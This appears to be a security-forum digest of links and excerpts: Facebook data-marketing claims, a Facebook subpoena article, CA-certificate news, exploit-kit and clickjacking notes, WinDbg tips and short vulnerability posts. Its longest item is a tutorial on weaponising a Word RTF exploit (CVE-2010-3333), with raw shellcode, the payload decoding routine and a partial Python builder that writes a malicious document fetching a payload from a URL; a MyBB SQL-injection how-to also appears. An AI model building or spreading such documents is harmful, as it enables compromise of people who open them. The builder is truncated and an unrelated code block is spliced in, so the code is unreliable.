So Facebook and social networks in general use such cookies, or could use them, to find the buyers of various products, whether luxury goods or everyday items. And businesses would only have to buy these lists. Such lists are available from advertising agencies all over the world. They have an initial price that varies depending on the market you want to approach. The more specialized the list, the more it costs to create, and the higher its selling price. A basic list, with name, surname, address, phone number, etc., costs approximately 40 dollars per 1000 potential customers in the USA. A list with information such as occupation, city of residence, number of properties acquired over a lifetime, the buyers' lifestyle, etc., has an average price of approximately 120 dollars per 1000 potential customers, also in the USA.

Today Facebook goes even further, thanks to cookies and to consumers' buying habits. This allows it to target millions of people precisely, with reliability increased by 500%, since Facebook can use word-recognition software on its own site. For example, the software can track everyone who used the words Mercedes Benz in their posts. Facebook can thus build an extremely precise marketing list. And of course the price of such a list goes up. Imagine you are on Facebook, chatting with your brother or a brother-in-law, and at some point you say: "Yes, I'm thinking of buying a new car, a Mercedes Benz, in a couple of days." The software retrieves your name, your username, the city you live in, your occupation and any other pertinent information to work out which car dealership you might buy the car from. A Facebook representative calls that dealership and agrees to provide it with this information for a fee. You then get a phone call from the car dealership in question, inviting you to take advantage of an offer you can't refuse… And that is how we get a type of marketing with an extremely precise target. And this practice will bring Facebook billions of dollars in revenue.

Such a list can reach 2500 or even more than 5000 dollars per 1000 potential customers, multiplied, obviously, by the number of Facebook users. Obviously, Facebook will also establish associations and links with other sites, recommend purchases to its members through other sites, and other things of this kind (indirect marketing). You can get at least some small idea of the wealth this company holds. And this process is going to be implemented by every social network that currently exists on the web.

Source: Cum vor sa castige bani retelele sociale precum Facebook
  13. Which VPN Service Providers Really Take Anonymity Seriously? If you are going to do "stuff" anyway, don't take risks. Use at least a VPN (like the ones here). If that's not OK, then Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/
  14. When the cops subpoena your Facebook information, here's what Facebook sends the cops. The information is not new, but I find it useful. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information.
And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook IDs were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it. You can find the PDF here: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx
  15. Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, provided an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let's first explore this document (Laden's Death.doc) to see whether it's an exploit or not by just looking at it in a hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the pFragment parameter and analyze anything suspicious there. When I opened the document in hex, I found something suspicious as an address in the pFragment parameter, and that is bc41db77; let's search this address in the debugger (77db41bc): Address not found. That's why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it's crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of XP SP2, but I am using XP SP3, so this address is not available. It can be made to work on XP SP3 by taking any address from an XP SP3 dll. I took it from kernel32.dll's jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll, XP Service Pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it.
C:/RECYCLER/server.exe does the following:
• Drops a file in the system's temp folder: vmm2.tmp
• File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll
• Makes registry modifications in an attempt to hijack the DHCP service
The payload has the ability to:
• Download additional malware
• Connect and send sensitive data back to remote servers
• Act as a trojan proxy server
So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it: 1) in a hex editor, 2) in a debugger. Let me open the sample in a hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure. After a deep analysis, we found that the shell code has been encrypted by an 8-bit XOR with EE, as in the instruction XOR BYTE PTR DS:[EDX+ECX], 0EE. Also, the encryption runs from the end to the start, that is, from eeeeeeee back to the start of the shell code. Now it's time to replace the full shell code with your own code. I have the following shell code that will execute calc from our server:
eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83.
So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it's time to analyze the dropped dll, which has been dropped into system32 with the name dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in the c:\windows\system32 folder, as in the picture, and that it is going to be executed by rundll32.exe.
We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it to the debugger. There is a process to attaching the debugger. I am going to attach it to WinWord, as it is an Office document file. After attaching and before executing, we have to set breakpoints (F2) in the debugger on various win32 functions. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions on which it is desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLibrary, etc. After setting a breakpoint, we have to Step Over (F8) in the debugger, and while doing this we will have to look carefully for any suspicious address in the stack window of the debugger (bottom right). We mainly analyze the LoadLibrary function as well and, while analyzing, we look to see whether any library or any function gets loaded from some suspicious address ("suspicious" means an address that does not belong to the kernel). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. In the above picture, look at the stack window. There is a call to the CreateFileA function from address 0011F438. Now our next job is to start analyzing from this address, so we will set a breakpoint at 0011F438.
Now our main job should be to find the actual location of the embedded dll/exe, that is, the start location and end location of the exe/dll, and the algorithm by which the exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instructions:
0011F54E AC LODS BYTE PTR DS:[ESI]
0011F54F 3C 00 CMP AL, 0
0011F551 74 06 JE SHORT 0011F559
0011F553 3C FC CMP AL, 0FC
0011F555 74 02 JE SHORT 0011F559
0011F557 34 FC XOR AL, 0FC
0011F559 AA STOS BYTE PTR ES:[EDI]
0011F55A E2 F2 LOOPD SHORT 0011F54E
Let's look at the two boldfaced instructions. The instruction 0011F54E AC LODS BYTE PTR DS:[ESI] reads the address stored at ESI and stores its value in EAX, while the instruction 0011F559 AA STOS BYTE PTR ES:[EDI] stores the value of EAX to EDI. So the encryption algorithm is to read each byte of the exe; if it is 0 or 0FC then leave it as it is, if not then XOR it with 0FC, as in the instruction 0011F557 34 FC XOR AL, 0FC. So we have found the encryption. The next step is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in the dump window: There is a sequence of values with ASCII 6161616161, etc.; let's search for this value in the hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in the dump), so let's move into hex to decrypt the value and try to find MZ (as MZ is the start header of a PE file). If MZ is found, it indicates that this is the beginning of the exe. Now what is the total size of the exe? For that, we have to check the file that's dropped into c:/windows/system32, dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of the exe/dll. We find the total size of the dll is ADD8 in hex, 44504 in decimal.
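The decoding step above, as an added example that is not part of the original post: a Python carver that applies the conditional XOR 0FC rule from the debugger loop, checks for the MZ/PE header and, going one step beyond the post, derives the image size from the PE section table instead of from the dropped dhcpsrv.dll. It assumes (a constructed layout, not taken from the real sample) that the image is stored as ASCII hex text directly after the }}}} marker; the sample RTF fragment and the fake PE are built inline.

```python
"""Added example: carve and decode a PE embedded after a '}}}}' marker using the
conditional-XOR rule seen in the debugger loop (0x00 and 0xFC pass through, every
other byte is XORed with 0xFC).  The hex-text layout is an assumption."""
import binascii
import re
import struct

HEX_RUN = re.compile(rb"[0-9A-Fa-f]+")


def conditional_xor(data: bytes, key: int = 0xFC) -> bytes:
    """Mirror of the loop LODSB / CMP AL,0 / CMP AL,key / XOR AL,key / STOSB.
    The transform is an involution, so the same function encodes and decodes."""
    out = bytearray(len(data))
    for i, b in enumerate(data):
        out[i] = b if b in (0x00, key) else b ^ key
    return bytes(out)


def pe_size_from_headers(pe: bytes):
    """On-disk size implied by the section table (largest PointerToRawData +
    SizeOfRawData), or None if the buffer lacks a well-formed MZ/PE header.
    This replaces the post's trick of reading the size off the dropped DLL."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(pe) < e_lfanew + 24:
        return None
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    sect = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER
    if len(pe) < sect + 40 * nsections:
        return None
    end = sect + 40 * nsections              # at least the headers themselves
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def carve_payload(rtf: bytes, marker: bytes = b"}}}}", key: int = 0xFC):
    """Try every marker occurrence, decode the hex run that follows it and keep
    the first one that yields an MZ/PE image.  Returns (offset_of_hex, pe) or
    None.  Trailing filler (the 6161... run in the post) is cut off by the size
    computed from the headers."""
    start = 0
    while True:
        pos = rtf.find(marker, start)
        if pos < 0:
            return None
        m = HEX_RUN.match(rtf, pos + len(marker))
        if m:
            hexrun = m.group(0)[: len(m.group(0)) & ~1]   # drop an odd nibble
            decoded = conditional_xor(binascii.unhexlify(hexrun), key)
            size = pe_size_from_headers(decoded)
            if size is not None and size <= len(decoded):
                return pos + len(marker), decoded[:size]
        start = pos + 1


def build_fake_pe() -> bytes:
    """Constructed stand-in for the dropped DLL: MZ stub, PE signature, one
    section whose raw data ends at offset 0xA0.  The section data deliberately
    contains 0x00 and 0xFC bytes so the decoder's pass-through rule is hit."""
    img = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", img, 0x3C, 0x40)                  # e_lfanew
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x2102)
    img += (b".text\0\0\0" + struct.pack("<IIII", 0x10, 0x1000, 0x20, 0x80)
            + b"\0" * 16)
    img += bytes(range(0x10)) + b"\xfc\x00\xfc\x00" + b"\x90" * 12
    return bytes(img)


def build_sample_rtf(pe: bytes) -> bytes:
    """Constructed RTF fragment in the assumed layout: the encoded image as hex
    text right after '}}}}', followed by a 6161... filler run."""
    enc = binascii.hexlify(conditional_xor(pe))
    return (b"{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;1;" + b"00" * 8
            + b"}}}}" + enc + b"61" * 16 + b"}")
```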
So now we have found:
Encryption algorithm
Start location of the dll/exe
End location of the dll/exe
Now our main job is to write the creator with the proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of the exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in system32 (the dll file). So now it's time to write the full creator code that I have written in Python. Here is the full creator:
"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 
"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 
    # ... remaining bytes of header and footer omitted (they are the long hex byte strings
    # holding the RTF document body and the shellcode)
    url = ""
    ul = open("URL.txt", 'rb')
    sr = ul.read()
    # hex-encode every byte of the URL (Python 2: sr is a str, so ord() works per byte)
    for i in range(0, len(sr)):
        a = ord(sr[i])
        url += "%02x" % a
    url += "\x30" * 2          # terminate the encoded URL with "00"
    payload = header + url + footer
    file = open("Laden.doc", 'wb')
    file.write(header + url + footer)
    file.close()
    os.rename("Laden.doc", st)

URL.txt contains the actual URL from which calc is to be downloaded. This URL.txt file should be in the same folder as the creator file. You can also embed the URL directly as a text string in the creator file.

One more point: reversing an exploit sample will vary from exploit to exploit. It's not that while reversing another sample you will always apply the same process, but in 80% of the cases it's what I explain above.

Source: InfoSec Institute Resources – Reversing a Malicious Word Document
17. [h=1]TURKTRUST CA Problems[/h]
Kurt Baumgartner, Kaspersky Lab Expert
Posted January 03, 21:04 GMT

Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple of major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other Google properties. A Chrome installation detected "an unauthorized digital certificate for the "*.google.com" domain" late on the night of Dec. 24th 2012, and the Google security team's investigation began there.

TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused to fraudulently issue a certificate for *.google.com.

Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes from the recent past. This list of Google properties is fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.youtube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com

The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are affected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on Windows Vista and Windows 7, on Windows XP and its manual root update package, and on Windows Server 2003, Windows Server 2008 and Windows Server 2008 R2 systems.

To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly affect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2.

Both Mozilla and Google posted information about the problem. Google pushed Chrome's certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the "TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. © Aralık 2007" root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues.

Source: TURKTRUST CA Problems - Securelist
Analytical Summary Of The Blackhole Exploit Kit
Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT - Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit

There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly.

A. What a browser exploit kit is, and what it isn't
   - It only does exploits
   - Directing victims to the exploits is out of scope
     - Usually done with spam or iframe injections
   - The actual malware installed is out of scope too
   - Where the exploit kit is hosted is also quite variable
B. Timeline
   - Version 1.0.0 - September 2010
     i. It's not that different from other exploit kits
   - Version 1.0.1
   - Version 1.0.2 - November 2010
     i. Changelog
     ii. Leaked in May 2011
   - Version 1.1.0 - December 2010
     i. Changelog
   - Version 1.2.0 - August 2011
     i. Changelog
   - Version 1.2.1 - December 2011
   - Version 1.2.2
     i. Cryptome "Virus"
   - Version 1.2.3 - March 2012
   - Version 1.2.4 - June 2012
     i. CVE-2012-1723
     ii. CVE-2011-2110
   - Version 1.2.5 - July 2012
     i. CVE-2012-1889
     ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm'
   - August 2012
     i. CVE-2012-4681
   - Version 2.0.0 - September 2012
     i. Changelog
     ii. The official announcement isn't entirely true.
C. The "Free Version"
   - Pulled from a system with C99 Shell
   - IonCube "copy protection"
   - How to break IonCube obfuscation
   - Analysis of PHP Source Code
D. Open Source Code in use
   - PluginDetect
   - MaxMind GeoIP
   - etc.
E. The Exploits
   - CVE-2010-0188
   - etc. etc. etc. as time allows
X. There is almost no change in the exploits themselves from one version of the exploit kit to the next.
Y. Curious clues about the possible authorship of some exploits
Beef - Java Payload Exploitation
Description: In this video I will show you how to exploit a system using the BeEF Browser Exploitation Framework and the Java Payload module. In the BeEF Framework there is a module called Java Payload under local exploits; we are going to use that module to exploit a Windows 7 system. So, first you need to hook the browser and use that module; the victim will get the Java pop-up, and if he clicks OK you will get the meterpreter shell after some time. Note: getting the session will take some time, so be patient.
20. [h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]
January 3rd, 2013, 15:33 GMT · By Eduard Kovacs

Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what's known as identification attacks. He has also identified a clickjacking flaw in Google Chrome.

The fact that many websites don't use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user's email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities.

However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. "Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the 'dropper' is a form (text area, input text field, etc.) located on the same domain," the researcher explained. "Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntarily publish sensitive data."

To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert:

Source: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia
21. I knew it was a macro, but I didn't know how it was defined, and after a little searching:

WinBase.h
#define ZeroMemory RtlZeroMemory

RtlZeroMemory is defined in WDH.h:
#define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length))

Apparently it's the same thing. There are probably small differences at call time, though: "memset" will probably call the wrapper in the Visual C runtime, while the ZeroMemory call may be executed directly in the kernel (RtlZeroMemory routine (Windows Drivers)). I'll do a bit of research to check.
22. [h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]
By: Larry Larsen, Andrew Richards, Chad Beeder
33 minutes, 48 seconds

In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session. We cover these commands:

   !address -summary
   !address <addr>
   !vprot <addr>
   !mapped_file <addr>

Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution.

Resources:
   Microsoft Windows SDK for Windows 7 and .NET Framework 4
   Sysinternals VMMap
   Performance and Memory Consumption Under WOW64
   MEMORY_BASIC_INFORMATION structure
   Memory Protection Constants

Timeline:
   [00:50] - Live Debug of Notepad
   [01:10] - VMMap of Notepad
   [02:08] - Virtual Address Space summary (!address -summary)
   [04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB
   [08:11] - Memory Mapped Files
   [10:11] - Memory Type, State and Protection (inc. Guard Pages)
   [21:22] - Allocation Base vs. Base Address (!address <addr>)
   [26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>)
   [29:14] - Mapped Files (!mapped_file <addr>)

Source: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9
23. NFC - NEAR FIELD COMMUNICATION
Subho Halder and Aditya Gupta

INTRODUCTION
Near Field Communication at a glance. What is NFC? NFC or Near Field Communication is a set of standards or protocols for communication between two devices by either touching them together or bringing them into close proximity (less than 4 cm). The communication protocols of such devices are based on RFID standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded in 2004 by major companies such as Sony, Nokia, Philips, Samsung etc. The operating frequency of such communication is merely 13.56 MHz (+/- 7), which is very low. This gives the advantage of easy integration into portable devices without the need for much battery power.

Download: www.exploit-db.com/download_pdf/23826
24. [h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h]
MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection.

Vulnerable code: /editpost.php
=== Line 398 ===
$posthash_query = "posthash='{$posthash}' OR ";
===

It can be done by using Tamper Data (or Live HTTP Headers): when submitting a post, edit the 'posthash' POST parameter to your payload, submit, then go to edit your post. Small "HOWTO" in pictures: http://imgur.com/a/JxfEI

This bug was not found by me, but afaik I am the first one to release it.

-- *Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>

Source: MyBB (editpost.php, posthash) SQL Injection Vulnerability
25. [h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h]
# Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection
# Google Dork: intext:"This site is powered by e107"
# Date: 01/01/13
# Exploit Author: Joshua Reynolds
# Vendor Homepage: http://e107.org
# Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download
# Version: 1.0.2
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2012-6434
-----------------------------------------------------------------------------------------
Description:
